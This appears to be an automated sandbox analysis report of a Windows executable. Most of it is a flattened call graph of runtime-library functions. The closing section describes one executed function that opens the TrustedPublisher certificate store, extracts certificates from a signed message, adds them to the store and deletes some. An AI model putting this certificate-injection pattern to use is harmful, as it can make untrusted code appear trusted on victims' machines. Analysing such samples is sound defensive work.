5934 bb4869 _free 15 API calls 5936 bb3dc4 5934->5936 5935->5937 5938 bb4869 _free 15 API calls 5936->5938 5937->5934 5939 bb3dd7 5938->5939 5940 bb4869 _free 15 API calls 5939->5940 5941 bb3de8 5940->5941 5942 bb4869 _free 15 API calls 5941->5942 5943 bb3df9 5942->5943 6516 bb430f 6517 bb431a 6516->6517 6521 bb432a 6516->6521 6522 bb4330 6517->6522 6520 bb4869 _free 15 API calls 6520->6521 6523 bb4349 6522->6523 6524 bb4343 6522->6524 6526 bb4869 _free 15 API calls 6523->6526 6525 bb4869 _free 15 API calls 6524->6525 6525->6523 6527 bb4355 6526->6527 6528 bb4869 _free 15 API calls 6527->6528 6529 bb4360 6528->6529 6530 bb4869 _free 15 API calls 6529->6530 6531 bb436b 6530->6531 6532 bb4869 _free 15 API calls 6531->6532 6533 bb4376 6532->6533 6534 bb4869 _free 15 API calls 6533->6534 6535 bb4381 6534->6535 6536 bb4869 _free 15 API calls 6535->6536 6537 bb438c 6536->6537 6538 bb4869 _free 15 API calls 6537->6538 6539 bb4397 6538->6539 6540 bb4869 _free 15 API calls 6539->6540 6541 bb43a2 6540->6541 6542 bb4869 _free 15 API calls 6541->6542 6543 bb43b0 6542->6543 6548 bb41f6 6543->6548 6554 bb4102 6548->6554 6550 bb421a 6551 bb4246 6550->6551 6567 bb4163 6551->6567 6553 bb426a 6553->6520 6555 bb410e ___scrt_is_nonwritable_in_current_image 6554->6555 6562 bb56e2 EnterCriticalSection 6555->6562 6557 bb4142 6563 bb4157 6557->6563 6559 bb4118 6559->6557 6561 bb4869 _free 15 API calls 6559->6561 6560 bb414f _abort 6560->6550 6561->6557 6562->6559 6566 bb572a LeaveCriticalSection 6563->6566 6565 bb4161 6565->6560 6566->6565 6568 bb416f ___scrt_is_nonwritable_in_current_image 6567->6568 6575 bb56e2 EnterCriticalSection 6568->6575 6570 bb4179 6571 bb43d9 __dosmaperr 15 API calls 6570->6571 6572 bb418c 6571->6572 6576 bb41a2 6572->6576 6574 bb419a _abort 6574->6553 6575->6570 6579 bb572a LeaveCriticalSection 6576->6579 6578 bb41ac 6578->6574 6579->6578 6108 bb55ce GetCommandLineA GetCommandLineW 5032 bb130d 5033 bb1319 ___scrt_is_nonwritable_in_current_image 5032->5033 5060 bb162b 5033->5060 5035 bb1320 5036 bb1473 5035->5036 5048 bb134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5035->5048 5112 bb191f IsProcessorFeaturePresent 5036->5112 5038 bb147a 5039 bb1480 5038->5039 5116 bb37e1 5038->5116 5119 bb3793 5039->5119 5043 bb1369 5044 bb13ea 5068 bb1a34 5044->5068 5048->5043 5048->5044 5097 bb37a9 5048->5097 5052 bb1405 5103 bb1a6a GetModuleHandleW 5052->5103 5055 bb1410 5056 bb1419 5055->5056 5105 bb3784 5055->5105 5108 bb179c 5056->5108 5061 bb1634 5060->5061 5122 bb1bd4 IsProcessorFeaturePresent 5061->5122 5065 bb1645 5066 bb1649 5065->5066 5132 bb1f7d 5065->5132 5066->5035 5192 bb20b0 5068->5192 5071 bb13f0 5072 bb3457 5071->5072 5194 bb522b 5072->5194 5074 bb13f8 5077 bb1000 6 API calls 5074->5077 5076 bb3460 5076->5074 5198 bb55b6 5076->5198 5078 bb11e3 Sleep 5077->5078 5079 bb1096 CryptMsgGetParam 5077->5079 5080 bb11f7 5078->5080 5081 bb1215 CertCloseStore LocalFree LocalFree LocalFree 5078->5081 5082 bb10bc LocalAlloc 5079->5082 5083 bb1162 CryptMsgGetParam 5079->5083 5080->5081 5087 bb120a CertDeleteCertificateFromStore 5080->5087 5081->5052 5084 bb10d7 5082->5084 5085 bb1156 LocalFree 5082->5085 5083->5078 5086 bb1174 CryptMsgGetParam 5083->5086 5088 bb10e0 LocalAlloc CryptMsgGetParam 5084->5088 5085->5083 5086->5078 5089 bb1188 CertFindAttribute CertFindAttribute 5086->5089 5087->5080 5090 bb113d LocalFree 5088->5090 5091 bb1114 CertCreateCertificateContext 5088->5091 5092 bb11b1 5089->5092 5093 bb11b5 LoadLibraryA GetProcAddress 5089->5093 5090->5088 5096 bb114d 5090->5096 5094 bb1133 CertFreeCertificateContext 5091->5094 5095 bb1126 CertAddCertificateContextToStore 5091->5095 5092->5078 5092->5093 5093->5078 5094->5090 5095->5094 5096->5085 5098 bb37d1 __dosmaperr _abort 5097->5098 5098->5044 5099 bb4424 _abort 33 API calls 5098->5099 5102 bb3e9a 5099->5102 5100 bb3f24 _abort 33 API calls 5101 bb3ec4 5100->5101 5102->5100 5104 bb140c 5103->5104 5104->5038 5104->5055 5686 bb355e 5105->5686 5107 bb378f 5107->5056 5110 bb17a8 ___scrt_uninitialize_crt 5108->5110 5109 bb1421 5109->5043 5110->5109 5111 bb1f7d ___scrt_uninitialize_crt 7 API calls 5110->5111 5111->5109 5113 bb1935 _abort 5112->5113 5114 bb19e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5113->5114 5115 bb1a24 _abort 5114->5115 5115->5038 5117 bb355e _abort 23 API calls 5116->5117 5118 bb37f2 5117->5118 5118->5039 5120 bb355e _abort 23 API calls 5119->5120 5121 bb1488 5120->5121 5123 bb1640 5122->5123 5124 bb1f5e 5123->5124 5138 bb24b1 5124->5138 5128 bb1f6f 5129 bb1f7a 5128->5129 5152 bb24ed 5128->5152 5129->5065 5131 bb1f67 5131->5065 5133 bb1f90 5132->5133 5134 bb1f86 5132->5134 5133->5066 5135 bb2496 ___vcrt_uninitialize_ptd 6 API calls 5134->5135 5136 bb1f8b 5135->5136 5137 bb24ed ___vcrt_uninitialize_locks DeleteCriticalSection 5136->5137 5137->5133 5140 bb24ba 5138->5140 5141 bb24e3 5140->5141 5142 bb1f63 5140->5142 5156 bb271d 5140->5156 5143 bb24ed ___vcrt_uninitialize_locks DeleteCriticalSection 5141->5143 5142->5131 5144 bb2463 5142->5144 5143->5142 5173 bb262e 5144->5173 5149 bb2493 5149->5128 5151 bb2478 5151->5128 5153 bb2517 5152->5153 5154 bb24f8 5152->5154 5153->5131 5155 bb2502 DeleteCriticalSection 5154->5155 5155->5153 5155->5155 5161 bb2543 5156->5161 5159 bb2755 InitializeCriticalSectionAndSpinCount 5160 bb2740 5159->5160 5160->5140 5162 bb2560 5161->5162 5163 bb2564 5161->5163 5162->5159 5162->5160 5163->5162 5164 bb25cc GetProcAddress 5163->5164 5166 bb25bd 5163->5166 5168 bb25e3 LoadLibraryExW 5163->5168 5164->5162 5166->5164 5167 bb25c5 FreeLibrary 5166->5167 5167->5164 5169 bb25fa GetLastError 5168->5169 5170 bb262a 5168->5170 5169->5170 5171 bb2605 ___vcrt_InitializeCriticalSectionEx 5169->5171 5170->5163 5171->5170 5172 bb261b LoadLibraryExW 5171->5172 5172->5163 5174 bb2543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5173->5174 5175 bb2648 5174->5175 5176 bb2661 TlsAlloc 5175->5176 5177 bb246d 5175->5177 5177->5151 5178 bb26df 5177->5178 5179 bb2543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5178->5179 5180 bb26f9 5179->5180 5181 bb2714 TlsSetValue 5180->5181 5182 bb2486 5180->5182 5181->5182 5182->5149 5183 bb2496 5182->5183 5184 bb24a6 5183->5184 5185 bb24a0 5183->5185 5184->5151 5187 bb2669 5185->5187 5188 bb2543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5187->5188 5189 bb2683 5188->5189 5190 bb269b TlsFree 5189->5190 5191 bb268f 5189->5191 5190->5191 5191->5184 5193 bb1a47 GetStartupInfoW 5192->5193 5193->5071 5195 bb523d 5194->5195 5196 bb5234 5194->5196 5195->5076 5201 bb512a 5196->5201 5683 bb555d 5198->5683 5221 bb4424 GetLastError 5201->5221 5203 bb5137 5241 bb5249 5203->5241 5205 bb513f 5250 bb4ebe 5205->5250 5208 bb5156 5208->5195 5211 bb5199 5275 bb4869 5211->5275 5214 bb518c 5215 bb5194 5214->5215 5218 bb51b1 5214->5218 5272 bb47f9 5215->5272 5217 bb51dd 5217->5211 5281 bb4d94 5217->5281 5218->5217 5219 bb4869 _free 15 API calls 5218->5219 5219->5217 5222 bb443a 5221->5222 5223 bb4440 5221->5223 5284 bb5904 5222->5284 5227 bb448f SetLastError 5223->5227 5289 bb480c 5223->5289 5227->5203 5228 bb445a 5230 bb4869 _free 15 API calls 5228->5230 5233 bb4460 5230->5233 5231 bb446f 5231->5228 5232 bb4476 5231->5232 5301 bb4296 5232->5301 5235 bb449b SetLastError 5233->5235 5306 bb3f24 5235->5306 5238 bb4869 _free 15 API calls 5240 bb4488 5238->5240 5240->5227 5240->5235 5242 bb5255 ___scrt_is_nonwritable_in_current_image 5241->5242 5243 bb4424 _abort 33 API calls 5242->5243 5248 bb525f 5243->5248 5245 bb52e3 _abort 5245->5205 5247 bb3f24 _abort 33 API calls 5247->5248 5248->5245 5248->5247 5249 bb4869 _free 15 API calls 5248->5249 5542 bb56e2 EnterCriticalSection 5248->5542 5543 bb52da 5248->5543 5249->5248 5547 bb3f72 5250->5547 5253 bb4edf GetOEMCP 5256 bb4f08 5253->5256 5254 bb4ef1 5255 bb4ef6 GetACP 5254->5255 5254->5256 5255->5256 5256->5208 5257 bb62ff 5256->5257 5258 bb633d 5257->5258 5262 bb630d __dosmaperr 5257->5262 5259 bb47f9 _free 15 API calls 5258->5259 5261 bb5167 5259->5261 5260 bb6328 HeapAlloc 5260->5261 5260->5262 5261->5211 5264 bb52eb 5261->5264 5262->5258 5262->5260 5263 bb6992 __dosmaperr 2 API calls 5262->5263 5263->5262 5265 bb4ebe 35 API calls 5264->5265 5266 bb530a 5265->5266 5267 bb535b IsValidCodePage 5266->5267 5269 bb5311 _ValidateLocalCookies 5266->5269 5271 bb5380 _abort 5266->5271 5268 bb536d GetCPInfo 5267->5268 5267->5269 5268->5269 5268->5271 5269->5214 5584 bb4f96 GetCPInfo 5271->5584 5273 bb44a8 __dosmaperr 15 API calls 5272->5273 5274 bb47fe 5273->5274 5274->5211 5276 bb4874 HeapFree 5275->5276 5280 bb489d _free 5275->5280 5277 bb4889 5276->5277 5276->5280 5278 bb47f9 _free 13 API calls 5277->5278 5279 bb488f GetLastError 5278->5279 5279->5280 5280->5208 5647 bb4d51 5281->5647 5283 bb4db8 5283->5211 5317 bb5741 5284->5317 5286 bb592b 5287 bb5943 TlsGetValue 5286->5287 5288 bb5937 _ValidateLocalCookies 5286->5288 5287->5288 5288->5223 5294 bb4819 __dosmaperr 5289->5294 5290 bb4859 5293 bb47f9 _free 14 API calls 5290->5293 5291 bb4844 HeapAlloc 5292 bb4452 5291->5292 5291->5294 5292->5228 5296 bb595a 5292->5296 5293->5292 5294->5290 5294->5291 5330 bb6992 5294->5330 5297 bb5741 __dosmaperr 5 API calls 5296->5297 5298 bb5981 5297->5298 5299 bb599c TlsSetValue 5298->5299 5300 bb5990 _ValidateLocalCookies 5298->5300 5299->5300 5300->5231 5344 bb426e 5301->5344 5452 bb6b14 5306->5452 5309 bb3f35 5311 bb3f3e IsProcessorFeaturePresent 5309->5311 5316 bb3f5c 5309->5316 5313 bb3f49 5311->5313 5312 bb3793 _abort 23 API calls 5314 bb3f66 5312->5314 5480 bb4573 5313->5480 5316->5312 5318 bb576d 5317->5318 5319 bb5771 __dosmaperr 5317->5319 5318->5319 5322 bb5791 5318->5322 5323 bb57dd 5318->5323 5319->5286 5321 bb579d GetProcAddress 5321->5319 5322->5319 5322->5321 5324 bb57fe LoadLibraryExW 5323->5324 5328 bb57f3 5323->5328 5325 bb581b GetLastError 5324->5325 5326 bb5833 5324->5326 5325->5326 5329 bb5826 LoadLibraryExW 5325->5329 5327 bb584a FreeLibrary 5326->5327 5326->5328 5327->5328 5328->5318 5329->5326 5333 bb69d6 5330->5333 5332 bb69a8 _ValidateLocalCookies 5332->5294 5334 bb69e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 bb56e2 EnterCriticalSection 5334->5339 5336 bb69ed 5340 bb6a1f 5336->5340 5338 bb6a14 _abort 5338->5332 5339->5336 5343 bb572a LeaveCriticalSection 5340->5343 5342 bb6a26 5342->5338 5343->5342 5350 bb41ae 5344->5350 5346 bb4292 5347 bb421e 5346->5347 5361 bb40b2 5347->5361 5349 bb4242 5349->5238 5351 bb41ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 bb56e2 EnterCriticalSection 5351->5356 5353 bb41c4 5357 bb41ea 5353->5357 5355 bb41e2 _abort 5355->5346 5356->5353 5360 bb572a LeaveCriticalSection 5357->5360 5359 bb41f4 5359->5355 5360->5359 5362 bb40be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 bb56e2 EnterCriticalSection 5362->5369 5364 bb40c8 5370 bb43d9 5364->5370 5366 bb40e0 5374 bb40f6 5366->5374 5368 bb40ee _abort 5368->5349 5369->5364 5371 bb440f __fassign 5370->5371 5372 bb43e8 __fassign 5370->5372 5371->5366 5372->5371 5377 bb6507 5372->5377 5451 bb572a LeaveCriticalSection 5374->5451 5376 bb4100 5376->5368 5378 bb6587 5377->5378 5381 bb651d 5377->5381 5380 bb4869 _free 15 API calls 5378->5380 5404 bb65d5 5378->5404 5382 bb65a9 5380->5382 5381->5378 5385 bb4869 _free 15 API calls 5381->5385 5386 bb6550 5381->5386 5383 bb4869 _free 15 API calls 5382->5383 5387 bb65bc 5383->5387 5384 bb65e3 5389 bb6643 5384->5389 5402 bb4869 15 API calls _free 5384->5402 5390 bb6545 5385->5390 5391 bb4869 _free 15 API calls 5386->5391 5403 bb6572 5386->5403 5392 bb4869 _free 15 API calls 5387->5392 5388 bb4869 _free 15 API calls 5393 bb657c 5388->5393 5395 bb4869 _free 15 API calls 5389->5395 5405 bb6078 5390->5405 5397 bb6567 5391->5397 5398 bb65ca 5392->5398 5394 bb4869 _free 15 API calls 5393->5394 5394->5378 5399 bb6649 5395->5399 5433 bb6176 5397->5433 5401 bb4869 _free 15 API calls 5398->5401 5399->5371 5401->5404 5402->5384 5403->5388 5445 bb667a 5404->5445 5406 bb6089 5405->5406 5432 bb6172 5405->5432 5407 bb609a 5406->5407 5408 bb4869 _free 15 API calls 5406->5408 5409 bb60ac 5407->5409 5411 bb4869 _free 15 API calls 5407->5411 5408->5407 5410 bb60be 5409->5410 5412 bb4869 _free 15 API calls 5409->5412 5413 bb60d0 5410->5413 5414 bb4869 _free 15 API calls 5410->5414 5411->5409 5412->5410 5415 bb60e2 5413->5415 5416 bb4869 _free 15 API calls 5413->5416 5414->5413 5417 bb4869 _free 15 API calls 5415->5417 5421 bb60f4 5415->5421 5416->5415 5417->5421 5418 bb4869 _free 15 API calls 5420 bb6106 5418->5420 5419 bb6118 5423 bb612a 5419->5423 5424 bb4869 _free 15 API calls 5419->5424 5420->5419 5422 bb4869 _free 15 API calls 5420->5422 5421->5418 5421->5420 5422->5419 5425 bb613c 5423->5425 5427 bb4869 _free 15 API calls 5423->5427 5424->5423 5426 bb614e 5425->5426 5428 bb4869 _free 15 API calls 5425->5428 5429 bb6160 5426->5429 5430 bb4869 _free 15 API calls 5426->5430 5427->5425 5428->5426 5431 bb4869 _free 15 API calls 5429->5431 5429->5432 5430->5429 5431->5432 5432->5386 5434 bb6183 5433->5434 5444 bb61db 5433->5444 5435 bb6193 5434->5435 5437 bb4869 _free 15 API calls 5434->5437 5436 bb61a5 5435->5436 5438 bb4869 _free 15 API calls 5435->5438 5439 bb4869 _free 15 API calls 5436->5439 5441 bb61b7 5436->5441 5437->5435 5438->5436 5439->5441 5440 bb61c9 5443 bb4869 _free 15 API calls 5440->5443 5440->5444 5441->5440 5442 bb4869 _free 15 API calls 5441->5442 5442->5440 5443->5444 5444->5403 5446 bb6687 5445->5446 5450 bb66a5 5445->5450 5447 bb621b __fassign 15 API calls 5446->5447 5446->5450 5448 bb669f 5447->5448 5449 bb4869 _free 15 API calls 5448->5449 5449->5450 5450->5384 5451->5376 5484 bb6a82 5452->5484 5455 bb6b6f 5456 bb6b7b _abort 5455->5456 5457 bb6ba2 _abort 5456->5457 5458 bb6ba8 _abort 5456->5458 5498 bb44a8 GetLastError 5456->5498 5457->5458 5460 bb6bf4 5457->5460 5464 bb6bd7 _abort 5457->5464 5466 bb6c20 5458->5466 5520 bb56e2 EnterCriticalSection 5458->5520 5461 bb47f9 _free 15 API calls 5460->5461 5462 bb6bf9 5461->5462 5517 bb473d 5462->5517 5464->5309 5467 bb6c7f 5466->5467 5469 bb6c77 5466->5469 5477 bb6caa 5466->5477 5521 bb572a LeaveCriticalSection 5466->5521 5467->5477 5522 bb6b66 5467->5522 5472 bb3793 _abort 23 API calls 5469->5472 5472->5467 5475 bb4424 _abort 33 API calls 5478 bb6d0d 5475->5478 5476 bb6b66 _abort 33 API calls 5476->5477 5525 bb6d2f 5477->5525 5478->5464 5479 bb4424 _abort 33 API calls 5478->5479 5479->5464 5481 bb458f _abort 5480->5481 5482 bb45bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 bb468c _abort _ValidateLocalCookies 5482->5483 5483->5316 5487 bb6a28 5484->5487 5486 bb3f29 5486->5309 5486->5455 5488 bb6a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 bb56e2 EnterCriticalSection 5488->5493 5490 bb6a42 5494 bb6a76 5490->5494 5492 bb6a69 _abort 5492->5486 5493->5490 5497 bb572a LeaveCriticalSection 5494->5497 5496 bb6a80 5496->5492 5497->5496 5499 bb44c7 5498->5499 5500 bb44c1 5498->5500 5502 bb480c __dosmaperr 12 API calls 5499->5502 5504 bb451e SetLastError 5499->5504 5501 bb5904 __dosmaperr 6 API calls 5500->5501 5501->5499 5503 bb44d9 5502->5503 5505 bb44e1 5503->5505 5507 bb595a __dosmaperr 6 API calls 5503->5507 5506 bb4527 5504->5506 5508 bb4869 _free 12 API calls 5505->5508 5506->5457 5509 bb44f6 5507->5509 5510 bb44e7 5508->5510 5509->5505 5511 bb44fd 5509->5511 5512 bb4515 SetLastError 5510->5512 5513 bb4296 __dosmaperr 12 API calls 5511->5513 5512->5506 5514 bb4508 5513->5514 5515 bb4869 _free 12 API calls 5514->5515 5516 bb450e 5515->5516 5516->5504 5516->5512 5529 bb46c2 5517->5529 5519 bb4749 5519->5464 5520->5466 5521->5469 5523 bb4424 _abort 33 API calls 5522->5523 5524 bb6b6b 5523->5524 5524->5476 5526 bb6d35 5525->5526 5528 bb6cfe 5525->5528 5541 bb572a LeaveCriticalSection 5526->5541 5528->5464 5528->5475 5528->5478 5530 bb44a8 __dosmaperr 15 API calls 5529->5530 5531 bb46d8 5530->5531 5535 bb46e6 _ValidateLocalCookies 5531->5535 5537 bb474d IsProcessorFeaturePresent 5531->5537 5533 bb473c 5534 bb46c2 _abort 21 API calls 5533->5534 5536 bb4749 5534->5536 5535->5519 5536->5519 5538 bb4758 5537->5538 5539 bb4573 _abort 3 API calls 5538->5539 5540 bb476d GetCurrentProcess TerminateProcess 5539->5540 5540->5533 5541->5528 5542->5248 5546 bb572a LeaveCriticalSection 5543->5546 5545 bb52e1 5545->5248 5546->5545 5548 bb3f85 5547->5548 5549 bb3f8f 5547->5549 5548->5253 5548->5254 5549->5548 5550 bb4424 _abort 33 API calls 5549->5550 5551 bb3fb0 5550->5551 5555 bb72d1 5551->5555 5556 bb72e4 5555->5556 5558 bb3fc9 5555->5558 5556->5558 5563 bb6754 5556->5563 5559 bb72fe 5558->5559 5560 bb7311 5559->5560 5562 bb7326 5559->5562 5561 bb5249 __fassign 33 API calls 5560->5561 5560->5562 5561->5562 5562->5548 5564 bb6760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 bb4424 _abort 33 API calls 5564->5565 5566 bb6769 5565->5566 5569 bb67b7 _abort 5566->5569 5575 bb56e2 EnterCriticalSection 5566->5575 5568 bb6787 5576 bb67cb 5568->5576 5569->5558 5574 bb3f24 _abort 33 API calls 5574->5569 5575->5568 5577 bb67d9 __fassign 5576->5577 5579 bb679b 5576->5579 5578 bb6507 __fassign 15 API calls 5577->5578 5577->5579 5578->5579 5580 bb67ba 5579->5580 5583 bb572a LeaveCriticalSection 5580->5583 5582 bb67ae 5582->5569 5582->5574 5583->5582 5588 bb4fd0 5584->5588 5591 bb507a _ValidateLocalCookies 5584->5591 5586 bb5031 5604 bb7cd1 5586->5604 5592 bb634d 5588->5592 5590 bb7cd1 38 API calls 5590->5591 5591->5269 5593 bb3f72 __fassign 33 API calls 5592->5593 5594 bb636d MultiByteToWideChar 5593->5594 5596 bb63ab 5594->5596 5597 bb6443 _ValidateLocalCookies 5594->5597 5598 bb62ff 16 API calls 5596->5598 5601 bb63cc _abort __alloca_probe_16 5596->5601 5597->5586 5598->5601 5599 bb643d 5609 bb646a 5599->5609 5601->5599 5602 bb6411 MultiByteToWideChar 5601->5602 5602->5599 5603 bb642d GetStringTypeW 5602->5603 5603->5599 5605 bb3f72 __fassign 33 API calls 5604->5605 5606 bb7ce4 5605->5606 5613 bb7ab4 5606->5613 5608 bb5052 5608->5590 5610 bb6487 5609->5610 5611 bb6476 5609->5611 5610->5597 5611->5610 5612 bb4869 _free 15 API calls 5611->5612 5612->5610 5614 bb7acf 5613->5614 5615 bb7af5 MultiByteToWideChar 5614->5615 5616 bb7b1f 5615->5616 5617 bb7ca9 _ValidateLocalCookies 5615->5617 5619 bb62ff 16 API calls 5616->5619 5620 bb7b40 __alloca_probe_16 5616->5620 5617->5608 5618 bb7b89 MultiByteToWideChar 5621 bb7ba2 5618->5621 5633 bb7bf5 5618->5633 5619->5620 5620->5618 5620->5633 5638 bb5a15 5621->5638 5623 bb646a __freea 15 API calls 5623->5617 5624 bb7bb9 5625 bb7bcc 5624->5625 5626 bb7c04 5624->5626 5624->5633 5629 bb5a15 6 API calls 5625->5629 5625->5633 5627 bb62ff 16 API calls 5626->5627 5631 bb7c25 __alloca_probe_16 5626->5631 5627->5631 5628 bb7c9a 5630 bb646a __freea 15 API calls 5628->5630 5629->5633 5630->5633 5631->5628 5632 bb5a15 6 API calls 5631->5632 5634 bb7c79 5632->5634 5633->5623 5634->5628 5635 bb7c88 WideCharToMultiByte 5634->5635 5635->5628 5636 bb7cc8 5635->5636 5637 bb646a __freea 15 API calls 5636->5637 5637->5633 5639 bb5741 __dosmaperr 5 API calls 5638->5639 5640 bb5a3c 5639->5640 5643 bb5a45 _ValidateLocalCookies 5640->5643 5644 bb5a9d 5640->5644 5642 bb5a85 LCMapStringW 5642->5643 5643->5624 5645 bb5741 __dosmaperr 5 API calls 5644->5645 5646 bb5ac4 _ValidateLocalCookies 5645->5646 5646->5642 5648 bb4d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 bb56e2 EnterCriticalSection 5648->5655 5650 bb4d67 5656 bb4dbc 5650->5656 5654 bb4d80 _abort 5654->5283 5655->5650 5668 bb54dc 5656->5668 5658 bb4e0a 5659 bb54dc 21 API calls 5658->5659 5660 bb4e26 5659->5660 5661 bb54dc 21 API calls 5660->5661 5662 bb4e44 5661->5662 5663 bb4d74 5662->5663 5664 bb4869 _free 15 API calls 5662->5664 5665 bb4d88 5663->5665 5664->5663 5682 bb572a LeaveCriticalSection 5665->5682 5667 bb4d92 5667->5654 5669 bb54ed 5668->5669 5672 bb54e9 5668->5672 5670 bb54f4 5669->5670 5674 bb5507 _abort 5669->5674 5671 bb47f9 _free 15 API calls 5670->5671 5673 bb54f9 5671->5673 5672->5658 5675 bb473d _abort 21 API calls 5673->5675 5674->5672 5676 bb553e 5674->5676 5677 bb5535 5674->5677 5675->5672 5676->5672 5679 bb47f9 _free 15 API calls 5676->5679 5678 bb47f9 _free 15 API calls 5677->5678 5680 bb553a 5678->5680 5679->5680 5681 bb473d _abort 21 API calls 5680->5681 5681->5672 5682->5667 5684 bb3f72 __fassign 33 API calls 5683->5684 5685 bb5571 5684->5685 5685->5076 5687 bb356a _abort 5686->5687 5688 bb3582 5687->5688 5701 bb36b8 GetModuleHandleW 5687->5701 5708 bb56e2 EnterCriticalSection 5688->5708 5694 bb358a 5700 bb35ff _abort 5694->5700 5709 bb3c97 5694->5709 5695 bb3671 _abort 5695->5107 5712 bb3668 5700->5712 5702 bb3576 5701->5702 5702->5688 5703 bb36fc GetModuleHandleExW 5702->5703 5704 bb3726 GetProcAddress 5703->5704 5705 bb373b 5703->5705 5704->5705 5706 bb3758 _ValidateLocalCookies 5705->5706 5707 bb374f FreeLibrary 5705->5707 5706->5688 5707->5706 5708->5694 5723 bb39d0 5709->5723 5743 bb572a LeaveCriticalSection 5712->5743 5714 bb3641 5714->5695 5715 bb3677 5714->5715 5744 bb5b1f 5715->5744 5717 bb3681 5718 bb36a5 5717->5718 5719 bb3685 GetPEB 5717->5719 5720 bb36fc _abort 3 API calls 5718->5720 5719->5718 5721 bb3695 GetCurrentProcess TerminateProcess 5719->5721 5722 bb36ad ExitProcess 5720->5722 5721->5718 5726 bb397f 5723->5726 5725 bb39f4 5725->5700 5727 bb398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 bb56e2 EnterCriticalSection 5727->5734 5729 bb3999 5735 bb3a20 5729->5735 5731 bb39a6 5739 bb39c4 5731->5739 5733 bb39b7 _abort 5733->5725 5734->5729 5736 bb3a48 5735->5736 5737 bb3a40 _ValidateLocalCookies 5735->5737 5736->5737 5738 bb4869 _free 15 API calls 5736->5738 5737->5731 5738->5737 5742 bb572a LeaveCriticalSection 5739->5742 5741 bb39ce 5741->5733 5742->5741 5743->5714 5745 bb5b44 5744->5745 5747 bb5b3a _ValidateLocalCookies 5744->5747 5746 bb5741 __dosmaperr 5 API calls 5745->5746 5746->5747 5747->5717 6740 bb324d 6741 bb522b 46 API calls 6740->6741 6742 bb325f 6741->6742 6751 bb561e GetEnvironmentStringsW 6742->6751 6746 bb4869 _free 15 API calls 6748 bb329f 6746->6748 6747 bb3275 6749 bb4869 _free 15 API calls 6747->6749 6750 bb326a 6749->6750 6750->6746 6752 bb5635 6751->6752 6762 bb5688 6751->6762 6753 bb563b WideCharToMultiByte 6752->6753 6756 bb5657 6753->6756 6753->6762 6754 bb3264 6754->6750 6763 bb32a5 6754->6763 6755 bb5691 FreeEnvironmentStringsW 6755->6754 6757 bb62ff 16 API calls 6756->6757 6758 bb565d 6757->6758 6759 bb5664 WideCharToMultiByte 6758->6759 6760 bb567a 6758->6760 6759->6760 6761 bb4869 _free 15 API calls 6760->6761 6761->6762 6762->6754 6762->6755 6764 bb32ba 6763->6764 6765 bb480c __dosmaperr 15 API calls 6764->6765 6770 bb32e1 6765->6770 6766 bb3345 6767 bb4869 _free 15 API calls 6766->6767 6768 bb335f 6767->6768 6768->6747 6769 bb480c __dosmaperr 15 API calls 6769->6770 6770->6766 6770->6769 6771 bb3347 6770->6771 6776 bb3369 6770->6776 6778 bb4869 _free 15 API calls 6770->6778 6780 bb3eca 6770->6780 6772 bb3376 15 API calls 6771->6772 6774 bb334d 6772->6774 6775 bb4869 _free 15 API calls 6774->6775 6775->6766 6777 bb474d _abort 6 API calls 6776->6777 6779 bb3375 6777->6779 6778->6770 6781 bb3ee5 6780->6781 6782 bb3ed7 6780->6782 6783 bb47f9 _free 15 API calls 6781->6783 6782->6781 6787 bb3efc 6782->6787 6784 bb3eed 6783->6784 6785 bb473d _abort 21 API calls 6784->6785 6786 bb3ef7 6785->6786 6786->6770 6787->6786 6788 bb47f9 _free 15 API calls 6787->6788 6788->6784 6109 bb9ec3 6110 bb9ed9 6109->6110 6111 bb9ecd 6109->6111 6111->6110 6112 bb9ed2 CloseHandle 6111->6112 6112->6110 6789 bb1442 6790 bb1a6a GetModuleHandleW 6789->6790 6791 bb144a 6790->6791 6792 bb144e 6791->6792 6793 bb1480 6791->6793 6794 bb1459 6792->6794 6798 bb3775 6792->6798 6795 bb3793 _abort 23 API calls 6793->6795 6797 bb1488 6795->6797 6799 bb355e _abort 23 API calls 6798->6799 6800 bb3780 6799->6800 6800->6794 6801 bb3d41 6804 bb341b 6801->6804 6805 bb342a 6804->6805 6806 bb3376 15 API calls 6805->6806 6807 bb3444 6806->6807 6808 bb3376 15 API calls 6807->6808 6809 bb344f 6808->6809 6580 bb3400 6581 bb3418 6580->6581 6582 bb3412 6580->6582 6583 bb3376 15 API calls 6582->6583 6583->6581 6584 bb1e00 6585 bb1e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6584->6585 6586 bb1e9e _ValidateLocalCookies 6585->6586 6589 bb2340 RtlUnwind 6585->6589 6588 bb1f27 _ValidateLocalCookies 6589->6588 5944 bb3d86 5945 bb1f7d ___scrt_uninitialize_crt 7 API calls 5944->5945 5946 bb3d8d 5945->5946 6810 bb9146 IsProcessorFeaturePresent 6113 bb98c5 6115 bb98ed 6113->6115 6114 bb9925 6115->6114 6116 bb991e 6115->6116 6117 bb9917 6115->6117 6122 bb9980 6116->6122 6118 bb9997 16 API calls 6117->6118 6120 bb991c 6118->6120 6123 bb99a0 6122->6123 6124 bba06f __startOneArgErrorHandling 16 API calls 6123->6124 6125 bb9923 6124->6125

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 00BB1000 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 199encryptionmemorylibraryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000104), ref: 00BB1016
                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00BB1025
                                                                                                                                                                                                                                                          • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00BB1032
